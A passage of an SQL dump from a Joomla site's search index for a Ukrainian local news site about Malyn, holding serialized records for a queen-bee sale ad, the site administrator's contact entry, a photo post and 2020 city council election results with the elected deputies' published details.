User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:42:\"/index.php/holuby/kinhy/2489-kingi-20-roku\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:10:\"Кінги\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Кінги\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2489\";s:5:\"route\";s:73:\"index.php?option=com_content&view=article&id=2489:kingi-20-roku&catid=127\";s:5:\"title\";s:22:\"Кінги 20 року\";s:11:\"description\";s:270:\" В наявності є два молодих кінга. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. Ціна 300, телефонуйте 0508320922, домовимось. \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-12-15 18:54:14\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-12-15 18:54:14\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4755,'index.php?option=com_contact&view=contact&id=1','index.php?option=com_contact&view=contact&id=1:administrator&catid=4:uncategorised','Адміністратор',' ','2020-12-16 12:09:59','d8bb60224899a5e82f97cb1f399254c6',1,1,1,'*','0000-00-00 00:00:00','0000-00-00 00:00:00','2014-09-19 11:09:24','0000-00-00 00:00:00',0,0,3,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:34:{s:2:\"id\";s:1:\"1\";s:5:\"alias\";s:13:\"administrator\";s:8:\"position\";s:0:\"\";s:7:\"address\";s:0:\"\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-12-16 10:09:59\";s:11:\"modified_by\";s:3:\"430\";s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";s:25:\"{\"robots\":\"\",\"rights\":\"\"}\";s:9:\"sortname1\";s:0:\"\";s:9:\"sortname2\";s:0:\"\";s:9:\"sortname3\";s:0:\"\";s:4:\"city\";s:10:\"Малин\";s:6:\"region\";s:22:\"Житомирська\";s:7:\"country\";s:14:\"Україна\";s:3:\"zip\";s:5:\"11601\";s:9:\"telephone\";s:0:\"\";s:3:\"fax\";s:0:\"\";s:7:\"summary\";s:92:\"<p><span style=\"font-size: 18.6667px;\"><em style=\"font-weight: bold;\">&nbsp;</em></span></p>\";s:5:\"email\";s:15:\"malehus@ukr.net\";s:6:\"mobile\";s:0:\"\";s:7:\"webpage\";s:0:\"\";s:8:\"ordering\";s:1:\"1\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":41:{s:21:\"show_contact_category\";s:0:\"\";s:17:\"show_contact_list\";s:0:\"\";s:18:\"presentation_style\";s:0:\"\";s:9:\"show_tags\";s:0:\"\";s:9:\"show_info\";s:0:\"\";s:9:\"show_name\";s:0:\"\";s:13:\"show_position\";s:0:\"\";s:10:\"show_email\";s:0:\"\";s:15:\"add_mailto_link\";s:0:\"\";s:19:\"show_street_address\";s:0:\"\";s:11:\"show_suburb\";s:0:\"\";s:10:\"show_state\";s:0:\"\";s:13:\"show_postcode\";s:0:\"\";s:12:\"show_country\";s:0:\"\";s:14:\"show_telephone\";s:0:\"\";s:11:\"show_mobile\";s:0:\"\";s:8:\"show_fax\";s:0:\"\";s:12:\"show_webpage\";s:0:\"\";s:10:\"show_image\";s:0:\"\";s:9:\"show_misc\";s:0:\"\";s:11:\"allow_vcard\";s:0:\"\";s:13:\"show_articles\";s:0:\"\";s:20:\"articles_display_num\";s:0:\"\";s:12:\"show_profile\";s:0:\"\";s:10:\"show_links\";s:0:\"\";s:10:\"linka_name\";s:0:\"\";s:5:\"linka\";b:0;s:10:\"linkb_name\";s:0:\"\";s:5:\"linkb\";b:0;s:10:\"linkc_name\";s:0:\"\";s:5:\"linkc\";b:0;s:10:\"linkd_name\";s:0:\"\";s:5:\"linkd\";b:0;s:10:\"linke_name\";s:0:\"\";s:5:\"linke\";b:0;s:14:\"contact_layout\";s:0:\"\";s:15:\"show_email_form\";s:0:\"\";s:15:\"show_email_copy\";s:0:\"\";s:16:\"validate_session\";s:0:\"\";s:12:\"custom_reply\";s:0:\"\";s:8:\"redirect\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:5:\"catid\";s:1:\"4\";s:8:\"category\";s:13:\"Uncategorised\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:15:\"1:administrator\";s:7:\"catslug\";s:15:\"4:uncategorised\";s:4:\"name\";s:10:\"Super User\";s:6:\"layout\";s:7:\"contact\";s:4:\"path\";s:79:\"/index.php/component/contact/contact/4-uncategorised/1-administrator?Itemid=104\";}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:15:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:8:\"position\";i:4;s:7:\"address\";i:5;s:4:\"city\";i:6;s:6:\"region\";i:7;s:7:\"country\";i:8;s:3:\"zip\";i:9;s:9:\"telephone\";i:10;s:3:\"fax\";i:11;s:5:\"email\";i:12;s:6:\"mobile\";i:13;s:7:\"webpage\";i:14;s:4:\"user\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:5:{s:4:\"Type\";a:1:{s:7:\"Contact\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Contact\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:13:\"Uncategorised\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:13:\"Uncategorised\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Region\";a:1:{s:22:\"Житомирська\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:22:\"Житомирська\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:7:\"Country\";a:1:{s:14:\"Україна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"Україна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:46:\"index.php?option=com_contact&view=contact&id=1\";s:5:\"route\";s:82:\"index.php?option=com_contact&view=contact&id=1:administrator&catid=4:uncategorised\";s:5:\"title\";s:26:\"Адміністратор\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";s:1:\"1\";s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-09-19 11:09:24\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4759,'index.php?option=com_content&view=article&id=2490','index.php?option=com_content&view=article&id=2490:ostanni-osinni-dni-v-malini&catid=8','Останні осінні дні в Малині',' ','2020-12-16 14:44:47','ada6e539a26a5f05f2546036d2cd9a09',1,1,1,'*','2020-12-16 12:44:34','0000-00-00 00:00:00','2020-12-16 12:44:34','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2490\";s:5:\"alias\";s:27:\"ostanni-osinni-dni-v-malini\";s:7:\"summary\";s:172:\"	<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/1612_1.jpg\"><img src=\"https://malehus.in.ua/images/stories/1612_1.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-12-16 12:44:47\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"2\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:32:\"2490:ostanni-osinni-dni-v-malini\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:54:\"/index.php/8-novini-2/2490-ostanni-osinni-dni-v-malini\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2490\";s:5:\"route\";s:85:\"index.php?option=com_content&view=article&id=2490:ostanni-osinni-dni-v-malini&catid=8\";s:5:\"title\";s:50:\"Останні осінні дні в Малині\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-12-16 12:44:34\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-12-16 12:44:34\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4761,'index.php?option=com_content&view=article&id=2487','index.php?option=com_content&view=article&id=2487:deputati-malinskoji-miskoji-radi&catid=8','Депутати Малинської міської ради ',' Коростенський р-н, Малинська міська рада Кількість депутатів місцевої ради, які обираються на відповідних виборах 34 Кількість обраних депутатів місцевої ради 34 ','2020-12-16 14:48:20','0b57aaf782824b7af599430187e7b538',1,1,1,'*','2020-11-08 18:31:46','0000-00-00 00:00:00','2020-11-08 18:31:46','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2487\";s:5:\"alias\";s:32:\"deputati-malinskoji-miskoji-radi\";s:7:\"summary\";s:418:\"	<p>Коростенський р-н, Малинська міська рада</p><table><tbody><tr><td><p>Кількість депутатів місцевої ради, які    обираються на відповідних виборах</p></td><td><p>34</p></td></tr><tr><td><p>Кількість обраних депутатів місцевої ради</p></td><td><p>34</p></td></tr></tbody></table><br>\";s:4:\"body\";s:22003:\"<p><a class=\"modal\" href=\"fr-dii fr-fin\"><a class=\"modal\" href=\"fr-dii fr-fin\"><img class=\"fr-dii fr-fin\"></a></a><!--[if !vml]--> Загальні відомості про результати голосування</p><table><tbody><tr><td><p>Назва    політичної партії, місцева організація якої висунула кандидатів у депутати</p></td><td><p>К-сть    голосів, поданих за місцеву організацію політичної партії</p></td><td><p>К-сть    отриманих депутатських мандатів</p></td></tr><tr><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>4472</p></td><td><p>16</p></td></tr><tr><td><p>політична партія Всеукраїнське об’єднання    \"Батьківщина\"</p></td><td><p>1252</p></td><td><p>5</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ \"ЄВРОПЕЙСЬКА СОЛІДАРНІСТЬ\"</p></td><td><p>1157</p></td><td><p>5</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ \"СЛУГА НАРОДУ\"</p></td><td><p>896</p></td><td><p>4</p></td></tr><tr><td><p>Політична партія \"Перемога Пальчевського\"</p></td><td><p>778</p></td><td><p>4</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ \"ПРОПОЗИЦІЯ\"</p></td><td><p>461</p></td><td><p>0</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ \"ОПОЗИЦІЙНА    ПЛАТФОРМА – ЗА ЖИТТЯ\"</p></td><td><p>376</p></td><td><p>0</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ \"ЗА МАЙБУТНЄ\"</p></td><td><p>329</p></td><td><p>0</p></td></tr><tr><td><p>Політична партія \"Радикальна Партія    Олега Ляшка\"</p></td><td><p>190</p></td><td><p>0</p></td></tr><tr><td><p>Політична Партія \"ГОЛОС\"</p></td><td><p>186</p></td><td><p>0</p></td></tr><tr><td><p>політична партія Всеукраїнське об’єднання    \"Свобода\"</p></td><td><p>154</p></td><td><p>0</p></td></tr><tr><td><p>Політична партія \"Ліва опозиція\"</p></td><td><p>102</p></td><td><p>0</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ    \"ГРОМАДСЬКО-ПОЛІТИЧНА ПЛАТФОРМА НАДІЇ САВЧЕНКО\"</p></td><td><p>94</p></td><td><p>0</p></td></tr></tbody></table><p><a class=\"modal\" href=\"fr-dii fr-fin\"><a class=\"modal\" href=\"fr-dii fr-fin\"><img class=\"fr-dii fr-fin\"></a></a><!--[if !vml]--> Відомості про обраних депутатів місцевої ради</p><table><tbody><tr><td><p>Назва    політичної партії, місцева організація якої висунула кандидатів у депутати</p></td><td><p>Кількість обраних    депутатів</p></td><td><p>Відсоток    від загального складу ради</p></td></tr><tr><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>16</p></td><td><p>47.06</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ \"ЄВРОПЕЙСЬКА СОЛІДАРНІСТЬ\"</p></td><td><p>5</p></td><td><p>14.71</p></td></tr><tr><td><p>політична партія Всеукраїнське об’єднання    \"Батьківщина\"</p></td><td><p>5</p></td><td><p>14.71</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ \"СЛУГА НАРОДУ\"</p></td><td><p>4</p></td><td><p>11.76</p></td></tr><tr><td><p>Політична партія \"Перемога Пальчевського\"</p></td><td><p>4</p></td><td><p>11.76</p></td></tr></tbody></table><p><br></p><table><tbody><tr><td><p>№ ТВО, за яким    закріплено</p></td><td><p>Прізвище, ім’я, по    батькові</p></td><td><p>Відомості про обраного    депутата</p></td><td><p>Голосів ЗА</p></td><td><p>% від квоти</p></td><td><p>Виборчий    округ, в якому обрано</p></td></tr><tr><td><p>політична партія Всеукраїнське об’єднання    \"Батьківщина\"</p></td></tr><tr><td><p>Перший кандидат</p></td><td><p>Шостак Олексій Григорович</p></td><td><p>Громадянин України, народився 14.08.1976 р., освіта вища, член    політичної партії Всеукраїнське об’єднання \"Батьківщина\",    Виконавчий комітет Малинської міської ради, Міський голова, місце проживання:    м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>1</p></td><td><p>Сніцаренко Леся Андріївна</p></td><td><p>Громадянка України, народилася 20.06.1977 р., освіта вища,    член політичної партії Всеукраїнське об’єднання \"Батьківщина\",    Виконавчий комітет Малинської міської ради, Заступник міського голови, місце    проживання: м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>26</p></td><td><p>8,81</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>1</p></td><td><p>Старжинський Ігор Олександрович</p></td><td><p>Громадянин України, народився 05.05.1992 р., освіта вища, член    політичної партії Всеукраїнське об’єднання \"Батьківщина\", ФОП    \"Старжинський\", Директор, місце проживання: м. Малин, Коростенський    р-н, Житомирська обл.</p></td><td><p>48</p></td><td><p>16,27</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>1</p></td><td><p>Столяр Олександр Васильович</p></td><td><p>Громадянин України, народився 19.06.1960 р., освіта середня    спеціальна, член політичної партії Всеукраїнське об’єднання    \"Батьківщина\", ФОП \"Столяр\", Директор, місце проживання: м.    Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>111</p></td><td><p>37,62</p></td><td><p>1</p></td></tr><tr><td><p>2</p></td><td><p>Сербін Валентин Іванович</p></td><td><p>Громадянин України, народився 28.12.1974    р., освіта вища, безпартійний, Житлово-комунальне господарство, Інспектор з    благоустрою, місце проживання: с. Нова Діброва, Коростенський р-н,    Житомирська обл.</p></td><td><p>67</p></td><td><p>22,71</p></td><td><p>2</p></td></tr><tr><td><p>ПОЛІТИЧНА    ПАРТІЯ \"ЄВРОПЕЙСЬКА СОЛІДАРНІСТЬ\"</p></td></tr><tr><td><p>Перший кандидат</p></td><td><p>Насіканова Марія Іванівна</p></td><td><p>Громадянка України, народилася 05.08.1958    р., освіта вища, член ПОЛІТИЧНОЇ ПАРТІЇ \"ЄВРОПЕЙСЬКА СОЛІДАРНІСТЬ\",    пенсіонер, місце проживання: м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>1</p></td><td><p>Хоменко Віктор Васильович</p></td><td><p>Громадянин України, народився 21.10.1972    р., освіта вища, безпартійний, ТОВ \"Папір-Мал\", директор, місце    проживання: м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>46</p></td><td><p>15,59</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>1</p></td><td><p>Будник Марія Миколаївна</p></td><td><p>Громадянка України, народилася 08.07.1973    р., освіта вища, член ПОЛІТИЧНОЇ ПАРТІЇ \"ЄВРОПЕЙСЬКА СОЛІДАРНІСТЬ\",    тимчасово не працює, місце проживання: м. Малин, Коростенський р-н,    Житомирська обл.</p></td><td><p>106</p></td><td><p>35,93</p></td><td><p>1</p></td></tr><tr><td><p>2</p></td><td><p>Мельник Олег Васильович</p></td><td><p>Громадянин України, народився 29.08.1984    р., освіта вища, член ПОЛІТИЧНОЇ ПАРТІЇ \"ЄВРОПЕЙСЬКА СОЛІДАРНІСТЬ\",    ТОВ \"Екогран\",, головний енергетик, місце проживання: м. Малин,    Коростенський р-н, Житомирська обл.</p></td><td><p>97</p></td><td><p>32,88</p></td><td><p>2</p></td></tr><tr><td><p>3</p></td><td><p>Малегус Ігор Євгенович</p></td><td><p>Громадянин України, народився 16.04.1969    р., освіта вища, безпартійний, Малинська райрада, керуючий справами, місце    проживання: м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>61</p></td><td><p>20,67</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>Політична    партія \"НАШ КРАЙ\"</p></td></tr><tr><td><p>Перший кандидат</p></td><td><p>Дмитренко Дмитро Васильович</p></td><td><p>Громадянин України, народився 28.01.1977    р., освіта вища, член Політичної партії \"НАШ КРАЙ\", ТОВ    \"Тандем\", Директор, місце проживання: м. Малин, Коростенський р-н,    Житомирська обл.</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>1</p></td><td><p>Приходько Ольга Василівна</p></td><td><p>Громадянка України, народилася 20.11.1967    р., освіта вища, безпартійна, Консультативно- діагностична поліклініка,    Завідуюча, місце проживання: м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>20</p></td><td><p>6,77</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>1</p></td><td><p>Гуцалюк Ольга Михайлівна</p></td><td><p>Громадянка України, народилася 26.06.1958    р., освіта загальна середня, безпартійна, ТОВ \"Малин Енергоінвест\",    Оператор насосної станції, місце проживання: м. Малин, Коростенський р-н,    Житомирська обл.</p></td><td><p>100</p></td><td><p>33,89</p></td><td><p>1</p></td></tr><tr><td><p>1</p></td><td><p>Лукашенко Віталій Анатолійович</p></td><td><p>Громадянин України, народився 05.04.1976    р., освіта вища, безпартійний, Фабрика банкнотного паперу Національного банку    України, Головний спеціаліст відділу супроводження інформаційних систем,    місце проживання: м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>132</p></td><td><p>44,74</p></td><td><p>1</p></td></tr><tr><td><p>1</p></td><td><p>Карпенко Сергій Васильович</p></td><td><p>Громадянин України, народився 21.07.1982 р., освіта вища, член    Політичної партії \"НАШ КРАЙ\", Малинське районне комунальне    підприємство з технічної інвентаризації, Начальник, місце проживання: м.    Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>164</p></td><td><p>55,59</p></td><td><p>1</p></td></tr><tr><td><p>1</p></td><td><p>Ситайло Олександр Григорович</p></td><td><p>Громадянин України, народився 17.08.1986    р., освіта вища, безпартійний, КП \"Екоресурс\", Директор, місце    проживання: м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>527</p></td><td><p>178,64</p></td><td><p>1</p></td></tr><tr><td><p>2</p></td><td><p>Костюченко Лариса Миколаївна</p></td><td><p>Громадянка України, народилася 28.09.1971    р., освіта вища, безпартійна, Малинський професійно- технічний ліцей,    Заступник директора, місце проживання: м. Малин, Коростенський р-н,    Житомирська обл.</p></td><td><p>48</p></td><td><p>16,27</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>2</p></td><td><p>Рудицька Олеся Ростиславівна</p></td><td><p>Громадянка України, народилася 19.06.1975    р., освіта вища, безпартійна, Малинського правління ОСББ \"Дружня    оселя\", Голова, місце проживання: м. Малин, Коростенський р-н,    Житомирська обл.</p></td><td><p>123</p></td><td><p>41,69</p></td><td><p>2</p></td></tr><tr><td><p>2</p></td><td><p>Сафранчук Сергій Петрович</p></td><td><p>Громадянин України, народився 19.10.1966    р., освіта вища, член Політичної партії \"НАШ КРАЙ\", ТОВ    \"Юнігран\", Заступник генерального директора, місце проживання: с.    